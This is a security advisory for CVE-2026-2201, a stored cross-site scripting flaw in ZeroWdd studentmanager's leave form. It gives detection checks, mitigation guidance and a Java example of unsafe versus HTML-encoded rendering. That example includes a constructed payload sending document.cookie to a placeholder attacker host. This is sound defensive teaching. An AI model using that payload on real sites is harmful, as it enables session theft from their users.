Platform
java
Component
studentmanager
Fixed version
2151560.0.1
CVE-2026-2201 describes a cross-site scripting (XSS) vulnerability discovered in ZeroWdd studentmanager, affecting all revisions up to commit 2151560fc0a50ec00426785ec1e01a3763b380d9. The flaw lets an attacker inject script into pages served by the application, potentially compromising user sessions and data. Because the project follows a rolling release model, no tagged version numbers are available; every deployment of the affected component should be checked against the mitigation guidance below.
The XSS vulnerability in ZeroWdd studentmanager allows an attacker to inject arbitrary JavaScript into the application's web pages. Successful exploitation can be used to steal session cookies, redirect users to attacker-controlled sites, or deface the application, and could expose sensitive student data such as grades, attendance records and personal information. The vulnerability is remotely exploitable: an attacker does not need to be on the same network as the studentmanager server, which broadens the attack surface considerably. Given the public disclosure, the risk of exploitation is elevated.
CVE-2026-2201 has been publicly disclosed, which raises the probability of exploitation. The vulnerability is rated LOW severity on the basis of its CVSS score. Public proof-of-concept (PoC) code may follow the disclosure, which would increase the risk further. The vulnerability was published on 2026-02-09. It is not currently listed in CISA KEV.
Educational institutions and organizations utilizing ZeroWdd studentmanager are at risk. Specifically, deployments where user-provided data is directly reflected in web pages without proper sanitization are particularly vulnerable. Users who rely on the studentmanager for sensitive student data management should prioritize implementing the recommended mitigations.
• java / server:
grep -n "Reason for Leave" src/main/java/com/wdd/studentmanager/controller/LeaveController.java
A match only locates the code that handles the field; open that handler and confirm whether the submitted value is HTML-encoded before it is written into a page. The literal string "<script" will not appear in the controller source, so grepping for it tells you nothing.
• generic web:
curl -sI <studentmanager_url>/leave/add | grep -iE "x-xss-protection|content-security-policy"
X-XSS-Protection is a legacy header that current Chromium- and Firefox-based browsers ignore; its presence does not fix this vulnerability and its absence does not confirm it. A Content-Security-Policy header that forbids inline script is a more meaningful sign that the deployment has some defence in depth.
Exploit status
EPSS
0.03% (9th percentile)
CISA SSVC
CVSS vector
Because ZeroWdd studentmanager follows a rolling release model, no tagged release containing a fix is available. The primary mitigation is to apply input validation and, above all, output encoding to the 'Reason for Leave' field handled in LeaveController.java: validate the submitted value for length and character class, and HTML-encode it at every point where it is written into a page so that HTML or JavaScript in the value is rendered as text rather than interpreted. A WAF (Web Application Firewall) can filter obvious payloads but is a secondary control, not a substitute for encoding. Review and update the application's codebase regularly to address other potential weaknesses. After applying these mitigations, test the application thoroughly to confirm the vulnerability is closed and that no new issues have been introduced.
Because the project's repository has been inactive for years and uses a continuous release model with no specific version information, we recommend discontinuing use of this software or considering a safer alternative. If continuing to run it is unavoidable, manually review and fix the code in `src/main/java/com/wdd/studentmanager/controller/LeaveController.java`, escaping or sanitizing the `Reason for Leave` argument in the `addLeave` function to avoid the XSS vulnerability.
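The two paragraphs above describe the fix in words: validate the 'Reason for Leave' value on input and HTML-encode it on output. The following is an added, self-contained example of that pattern; it is not code from ZeroWdd studentmanager, and the class, method and parameter names, the length cap and the sample payload are all assumptions chosen for illustration. It shows the vulnerable rendering (raw concatenation into markup) beside the hardened one so the difference in output is visible.

```java
import java.util.regex.Pattern;

/*
 * Added example; not code from ZeroWdd studentmanager. Names, the length
 * cap and the payload below are assumptions used for illustration only.
 */
public final class LeaveReasonXss {

    // Assumption: a leave reason is short free text; 500 chars is an illustrative cap.
    private static final int MAX_REASON_LENGTH = 500;
    // Reject control characters other than tab, CR and LF.
    private static final Pattern CONTROL_CHARS =
            Pattern.compile("[\\p{Cntrl}&&[^\\t\\r\\n]]");

    private LeaveReasonXss() {}

    /**
     * Input validation: enforce presence, length and character class, then
     * return the value unchanged. Deliberately no attempt to strip "<script>":
     * blocklists are bypassable, and a legitimate reason may contain "<".
     * Safety comes from encoding at output time, not from cleaning here.
     */
    public static String validateReason(String raw) {
        if (raw == null) {
            throw new IllegalArgumentException("reason is required");
        }
        String reason = raw.trim();
        if (reason.isEmpty() || reason.length() > MAX_REASON_LENGTH) {
            throw new IllegalArgumentException(
                    "reason must be 1-" + MAX_REASON_LENGTH + " characters");
        }
        if (CONTROL_CHARS.matcher(reason).find()) {
            throw new IllegalArgumentException("reason contains control characters");
        }
        return reason;
    }

    /**
     * Output encoding for an HTML text node or a double-quoted attribute value.
     * A real project should prefer a maintained encoder such as OWASP Java
     * Encoder's Encode.forHtml; this hand-written version keeps the example
     * dependency-free.
     */
    public static String encodeForHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Vulnerable pattern: user data concatenated straight into markup. */
    public static String renderReasonUnsafe(String reason) {
        return "<td>" + reason + "</td>";
    }

    /** Hardened pattern: encode at the point where the value enters HTML. */
    public static String renderReasonSafe(String reason) {
        return "<td>" + encodeForHtml(reason) + "</td>";
    }

    public static void main(String[] args) {
        // Constructed payload for demonstration; not a captured request.
        String payload = "Doctor visit<script>new Image().src="
                + "'http://attacker.example/c?'+document.cookie</script>";

        String reason = validateReason(payload);          // passes: it is legal text
        System.out.println(renderReasonUnsafe(reason));   // a browser would run the script
        System.out.println(renderReasonSafe(reason));     // a browser shows it as literal text
    }
}
```

The same rule applies in the view layer regardless of how the controller is written: in a Thymeleaf template `th:text` escapes its value while `th:utext` does not, and in JSP `<c:out value="${reason}"/>` escapes while a bare `${reason}` in template text does not. Whichever templating mechanism a deployment uses, every place the stored reason is rendered must go through the escaping form.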
CVE-2026-2201 is a cross-site scripting (XSS) vulnerability in ZeroWdd studentmanager revisions up to commit 2151560fc0a50ec00426785ec1e01a3763b380d9, allowing attackers to inject malicious scripts.
If you are running ZeroWdd studentmanager at a revision up to commit 2151560fc0a50ec00426785ec1e01a3763b380d9, you are potentially affected by this XSS vulnerability.
Due to the rolling release model, a direct patch is unavailable. Implement input validation and output encoding on the 'Reason for Leave' field, and consider using a WAF.
The vulnerability has been publicly disclosed, increasing the likelihood of exploitation. Monitor your systems for suspicious activity.
Refer to the ZeroWdd project's official communication channels and documentation for the latest advisory regarding CVE-2026-2201.